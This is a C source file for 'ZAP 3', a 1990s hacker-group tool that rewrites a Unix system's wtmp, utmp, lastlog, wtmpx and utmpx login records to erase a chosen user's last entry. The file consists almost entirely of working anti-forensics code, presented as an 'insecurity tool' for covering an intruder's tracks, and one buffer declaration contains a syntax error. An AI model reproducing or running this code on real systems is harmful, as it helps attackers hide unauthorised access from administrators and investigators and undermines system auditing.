/*
 *  ZAP 3,  removes user's last entry from WTMP+UTMP+LASTLOG+WTMPX+UTMPX 
 *  	    v. 1.0 by Mindmaniac --- 1996 [THC]  
 *
 *	    This is CERT approved insecurity tool. Use it at your own risk!
 *
 *
 *  Features:	- automatically finds your system dependent logfiles 
 *		  (after the scan the most recent file is used) 
 *  		- correct handling of lastlog (wtmp copy)
 *		- prevents UTMPX + WTMPX from logging at logout
 *		- fast handling of large log files (only for WTMP+UTMP)
 *		- no error handling, you know what it means ;)
 *
 *  Syntax:	zap3 [-v] <user>
 *
 *		<user>	name of user to remove from logfiles
 *		-v	verbose mode
 *
 *
 *        I DONT THINK THAT REAL TERROR HAS EVEN STARTED YET
 *
 *
 RELEASE NOTE: PRODUCT UNREVISITED - TO BE RELEASED AS IS - 1998
 */

#undef	TMPX	/*  Enable this (turn #undef to #define) if you have 
		    WTMPX + UTMPX an your system,  
		    i.e.: Solaris, IRIX, all SVR4, etc.. */
#define	LASTLOG	/*  Enable this if you have LASTLOG on your system,
		    those are all except HP-UX, BSDI, FreeBSD, AIX?, etc.. */

#define	WTMP
#define	UTMP
#define	WTMPX
#define	UTMPX
#define TMP	/*  WTMP + UTMP support, this is allways enabled */
	
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#ifdef LASTLOG
# include <lastlog.h>
#endif
#ifdef TMPX
# include <utmpx.h>
#endif
#include <sys/time.h>
#include <sys/stat.h>
#include <string.h>

#define WTMP_MODE 0644
#define COUNTREAD 1000L

int verbose=0;

void determine_log(tab, count, back) 
char *tab[];
int count;
char *back;
{
 int i;
 long mtime=0;
 char name[64];
 struct stat statbuf;
 strcpy(name,"");
 for (i=0;i<count;i++) {        
   if (stat(tab[i],&statbuf)) {
     if (verbose) printf("%s cannot open\n",tab[i]);
   }
   else {
     if (verbose) printf("%s is %s",tab[i],ctime(&statbuf.st_mtime));        
     if (statbuf.st_mtime>mtime) { 
       mtime = statbuf.st_mtime;
       strcpy(name,tab[i]); 
     }
   }
 }
 strcpy(back, name);
}

#ifdef TMP
void kill_tmp(user, old) 
char *user;
char *old;

{
 int fd, fd_out;
 long i, j, bytes_read;
 struct utmp utmp_ent[COUNTREAD];
 struct utmp utmp_ent_ORIG;
 long pos = -1;
 char new[64];

 strcpy(new,old); strcat(new,".new");
 fd = open(old, O_RDWR); if (fd < 0) { perror(old); exit(1); }

 while ( (bytes_read = read(fd,(char *)&utmp_ent,sizeof(utmp_ent))) > 0) {
   for (j=0; j< (bytes_read/sizeof(utmp_ent_ORIG)); j++) {
     if (!strncmp(utmp_ent[j].ut_name, user, sizeof(utmp_ent_ORIG.ut_name))) {
       pos = tell(fd) - bytes_read + j*(sizeof(utmp_ent_ORIG));
       }
   }
 }
/*
printf("Position: %d %d\n", pos, sizeof(utmp_ent_ORIG) );
*/
  
 if (pos!=-1) {fd_out=creat(new,O_RDWR); if (fd_out<0){
   perror(new);exit(1);
 }
   
   lseek(fd, 0, SEEK_SET);

/*  Ein chunk wurde eingelesen
 */ 
   while ( (bytes_read = read(fd, (char *)&utmp_ent,sizeof(utmp_ent) )) > 0 ) {
   
/*  stelle fest ob der gesuchte record sich darin befindet!
 *  d.h.: ? [  (tell(fd)) > pos)  &&  ((tell(fd)-bytes_read) <= pos)  ]
 */
     if ( (tell(fd) > pos ) && ( (tell(fd)-bytes_read) <= pos) ) {
       for (j=0; j< (bytes_read/sizeof(utmp_ent_ORIG)); j++) {
         if (pos != (tell(fd)-bytes_read + j*(sizeof(utmp_ent_ORIG)) )) {
           write(fd_out,(char *)&utmp_ent[j],sizeof(utmp_ent_ORIG));
         } 
         else {
           printf("Removing user %s at pos: %d\n", utmp_ent[j].ut_name,
                  (tell(fd)-bytes_read + j*(sizeof(utmp_ent_ORIG))));
         }                    
       }
     } 
     else {
       write(fd_out,(char *)&utmp_ent, sizeof(utmp_ent));
     }
   }
   printf("Done!\n"); 
 }
 else { printf("No user %s found in %s\n",user,old); }
 close(fd); close(fd_out);
 if (pos!=-1) { chmod(new,WTMP_MODE); remove(old);rename(new,old); }
}
#endif

#ifdef LASTLOG
void kill_lastlog(user, real_wtmp, old) 
char *user;
char *real_wtmp;
char *old;

{
 struct passwd 	*pw_ent;
 struct utmp 	utmp_ent;
 struct lastlog lastlog_ent;
 long pos=-1;
 int fd, fd_l;
 char new[64];
    
 if((pw_ent=getpwnam(user))==NULL){printf("User %s not found\n",user);return;}  

 strcpy(new,old); strcat(new,".new");
 if (!strcmp(real_wtmp,"")) {
   printf("Wtmp not found. Zeroing lastlog..\n",user);
   fd_l = open(old,O_RDWR);
   lseek(fd_l, ((long)pw_ent->pw_uid) * sizeof(lastlog_ent), 0);
   memset((char *)&lastlog_ent,0,sizeof(lastlog_ent));
   write(fd_l, (char *)&lastlog_ent, sizeof(lastlog_ent));
   close(fd_l);                        
   return;
 }

 fd = open(real_wtmp,O_RDWR); 
 while (read(fd,(char *)&utmp_ent,sizeof(utmp_ent)))
     	if (!strcmp(utmp_ent.ut_name,user)) pos=tell(fd);
 if (pos!=-1) {
   printf("Copying wtmp-data into lastlog..\n",user);
   lseek(fd,pos-sizeof(utmp_ent),SEEK_SET);
   read(fd,(char *)&utmp_ent,sizeof(utmp_ent));
 
   fd_l = open(old,O_RDWR);
   lseek(fd_l, (((long)pw_ent->pw_uid)) * sizeof(lastlog_ent), 0);
   read(fd_l, (char *)&lastlog_ent, sizeof(lastlog_ent));

   lastlog_ent.ll_time = utmp_ent.ut_time;
   strcpy(lastlog_ent.ll_line, utmp_ent.ut_line);
   memset(lastlog_ent.ll_host,0,sizeof(lastlog_ent.ll_host));

   lseek(fd_l, (((long)pw_ent->pw_uid)) * sizeof(lastlog_ent), 0);
   write(fd_l, (char *)&lastlog_ent, sizeof(lastlog_ent));
   close(fd_l);
 } 
 else {
   printf("User %s has no wtmp record. Zeroing lastlog..\n",user);
   fd_l = open(old,O_RDWR);
   lseek(fd_l, ((long)pw_ent->pw_uid) * sizeof(lastlog_ent), 0);
   memset((char *)&lastlog_ent,0,sizeof(lastlog_ent));
   write(fd_l, (char *)&lastlog_ent, sizeof(lastlog_ent));
   close(fd_l);                        
 }
 close(fd);                                   
}
#endif

#ifdef TMPX
void kill_tmpx(user, old) 
char *user;
char *old;

{
int fd, fd_out, i;
struct utmpx utmp_ent;
long pos = -1;
long pid = -1;
char line[32];
char tty = '#'; 
char new[64]=;

 strcpy(new,old); strcat(new,".new");
 fd = open(old,O_RDWR); if (fd < 0) { perror(old); exit(1); }

 while ( read(fd,(char *)&utmp_ent,sizeof(utmp_ent)) ) {
  if (!strcmp(utmp_ent.ut_name,user)) {
    pos=tell(fd);  
    pid=utmp_ent.ut_pid;
    tty=utmp_ent.ut_line[strlen(utmp_ent.ut_line)];
  }  
 }
 
 if (pos!=-1) { 
  fd_out=creat(new,O_RDWR);
  if (fd_out<0) { perror(new);  exit(1); }
    
  lseek(fd,0,SEEK_SET);
  while ( read(fd,(char *)&utmp_ent,sizeof(utmp_ent)) ) { 
   if ( (tell(fd) != pos) && (utmp_ent.ut_pid != pid) ) { 
    if ((utmp_ent.ut_line[0]=='/')
       &&(utmp_ent.ut_line[strlen(utmp_ent.ut_line)]==tty)){
     if (utmp_ent.ut_line[strlen(utmp_ent.ut_line)-1] =='9')
      utmp_ent.ut_line[strlen(utmp_ent.ut_line)-1]--;
     else utmp_ent.ut_line[strlen(utmp_ent.ut_line)-1]++;  
    }           
    write(fd_out,(char *)&utmp_ent,sizeof(utmp_ent)); 
   }
  }
  printf("Done!\n"); 
 }
 else { printf("No user %s found in %s\n",user,old); }
 close(fd); close(fd_out);
 if (pos!=-1) { chmod(new,WTMP_MODE); remove(old);rename(new,old); }
}
#endif

main(argc, argv)
int argc;
char **argv;
{

 static char *wtmp[4] = {
 "/var/adm/wtmp","/usr/adm/wtmp","/etc/wtmp","/var/log/wtmp"};
 static char *utmp[5] = {
 "/var/adm/utmp","/usr/adm/utmp","/etc/utmp","/var/log/utmp","/var/run/utmp"};
 static char *lastlog[4] = {
 "/var/adm/lastlog","/usr/adm/lastlog","/etc/lastlog","/var/log/lastlog"};
 static char *wtmpx[4] = {
 "/var/adm/wtmpx","/usr/adm/wtmpx","/etc/wtmpx","/var/log/wtmpx"};
 static char *utmpx[5] = {
 "/var/adm/utmpx","/usr/adm/utmpx","/etc/utmpx","/var/log/utmpx",
 "/var/run/utmpx"};

 char old[64] ="", real_wtmp[64]="";

 if (argc<2) { printf("Usage: %s [-v] <user>\n",argv[0]); exit (1); }
 if (argc>2) verbose=1;

#ifdef TMP
# ifdef WTMP
 printf("- WTMP:\n"); determine_log(wtmp,4, old); strcpy(real_wtmp,old);		
 if (strcmp(old,"")) {
   printf("WTMP = %s\n",old);   kill_tmp(argv[1+verbose], old); 
 } else printf("WTMP not found\n");
# endif

# ifdef UTMP 
 printf("- UTMP:\n"); determine_log(utmp,5, old);
 if (strcmp(old,"")) {
   printf("UTMP = %s\n",old);   kill_tmp(argv[1+verbose], old); 
 } else printf("UTMP not found\n");
# endif
#endif

#ifdef LASTLOG
 printf("- LASTLOG:\n"); determine_log(lastlog,4, old);
 if (strcmp(old,"")) {
   printf("LASTLOG = %s\n",old); kill_lastlog(argv[1+verbose],real_wtmp,old); 
 } else printf("LASTLOG not found\n");
#endif

#ifdef TMPX
# ifdef WTMPX
 printf("- WTMPX:\n"); determine_log(wtmpx,4, old);
 if (strcmp(old,"")) {
   printf("WTMPX = %s\n",old);  kill_tmpx(argv[1+verbose], old); 
 } else printf("WTMPX not found\n");
# endif

# ifdef UTMPX
 printf("- UTMPX:\n"); determine_log(utmpx,5, old);
 if (strcmp(old,"")) {
   printf("UTMPX = %s\n",old);  kill_tmpx(argv[1+verbose], old); 
 } else printf("UTMPX not found\n");
# endif
#endif


}

